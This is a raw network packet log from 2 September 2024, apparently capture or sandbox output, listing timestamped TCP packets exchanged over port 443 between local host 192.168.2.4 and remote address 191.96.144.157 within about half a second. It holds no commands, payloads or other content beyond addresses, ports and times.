Sep 2, 2024 11:42:53.939930916 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.939939022 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.939980030 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.940000057 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.940041065 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.940047979 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.940057993 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.940087080 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.940107107 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.940113068 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.940136909 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.940154076 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.940184116 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.940237045 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.940256119 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.940311909 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.940371990 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.940419912 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.940494061 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.940537930 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.940543890 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.940547943 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.940581083 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.940606117 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.940653086 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.940787077 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.940825939 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.022725105 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.022788048 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.022849083 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.022890091 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.022923946 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.022923946 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.022923946 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.022931099 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.022939920 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.022962093 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.022989988 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.022994041 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023078918 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023117065 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023122072 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.023127079 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023164988 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.023185015 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023232937 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.023236990 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023257017 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023279905 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.023283958 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023309946 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.023333073 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023380041 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.023384094 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023422956 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.023449898 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023498058 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023500919 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.023508072 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023552895 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.023562908 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023598909 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023611069 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.023614883 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023644924 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.023663044 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.023682117 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023736000 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.023803949 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023859978 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.023890018 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.023950100 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.023984909 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024035931 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024163961 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024208069 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024214029 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024255037 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024257898 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024267912 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024303913 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024312973 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024354935 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024358034 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024368048 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024405003 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024431944 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024472952 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024476051 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024492025 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024524927 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024529934 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024571896 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024575949 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024610043 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024626970 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024674892 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024674892 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024686098 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024717093 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024724960 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024734020 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024740934 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024769068 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024810076 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024854898 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024854898 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024858952 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024904013 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.024964094 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.024967909 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.026026964 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.107004881 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107193947 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.107218027 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107276917 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.107283115 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107316971 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107332945 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.107337952 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107358932 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.107383966 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.107415915 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107470036 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.107479095 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107523918 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.107667923 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107717991 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.107722044 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107731104 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107760906 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.107773066 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107781887 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.107785940 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107820034 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.107827902 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107877016 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.107889891 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107938051 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.107943058 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107986927 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.107992887 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.107996941 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108031988 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.108033895 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108076096 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108081102 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.108087063 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108139038 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.108161926 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108207941 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.108218908 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108256102 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108267069 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.108269930 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108299017 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.108311892 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108325005 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.108328104 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108360052 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.108429909 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108469009 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108475924 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.108479023 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108517885 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.108580112 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108623028 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108624935 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.108633041 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108674049 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.108798027 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108845949 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.108896017 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108947039 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108948946 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.108956099 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108999014 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.108999968 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.109009027 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.109040022 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.109047890 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.109096050 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.109101057 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.109142065 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.109200001 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.109242916 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.109257936 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.109261036 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.109288931 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.109298944 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.109306097 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.109308958 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.109340906 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.109352112 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.109354973 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.109383106 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.109400988 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.109478951 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.191662073 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.191723108 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.191848040 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.191903114 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.191903114 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.191912889 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.191945076 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.191963911 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192008018 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192022085 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192063093 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192078114 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192118883 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192125082 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192167997 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192178965 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192220926 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192224979 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192234993 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192264080 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192290068 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192332029 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192336082 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192347050 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192378044 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192382097 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192395926 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192406893 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192442894 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192446947 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192456007 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192485094 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192488909 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192516088 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192521095 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192562103 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192565918 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192604065 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192708969 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192747116 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192749977 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192756891 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192802906 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192863941 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192907095 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192913055 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192958117 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192959070 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.192966938 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.192995071 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193064928 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193106890 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193110943 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193118095 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193173885 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193205118 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193208933 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193217993 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193237066 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193264961 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193269014 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193275928 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193304062 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193304062 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193324089 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193330050 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193340063 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193350077 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193371058 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193377018 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193382978 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193418026 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193422079 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193442106 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193461895 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193464994 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193480968 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193510056 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193535089 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193537951 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193576097 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193672895 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193716049 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193723917 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193734884 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193773031 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193773985 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193784952 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193789005 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193815947 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193825960 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193829060 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.193856955 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.193870068 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.194138050 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.276361942 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.276472092 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.276479006 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.276489019 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.276635885 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.276635885 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.276681900 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.276737928 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.276741982 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.276789904 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.276792049 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.276817083 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.276844025 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.276916981 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.276963949 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.276968002 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.276977062 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277012110 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277019978 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277023077 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277065992 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277070045 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277081013 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277112007 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277142048 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277184010 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277188063 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277195930 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277236938 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277239084 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277256012 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277286053 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277299881 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277303934 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277309895 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277349949 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277352095 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277362108 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277393103 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277406931 CEST	443	49763	191.96.144.157	192.168.2.4
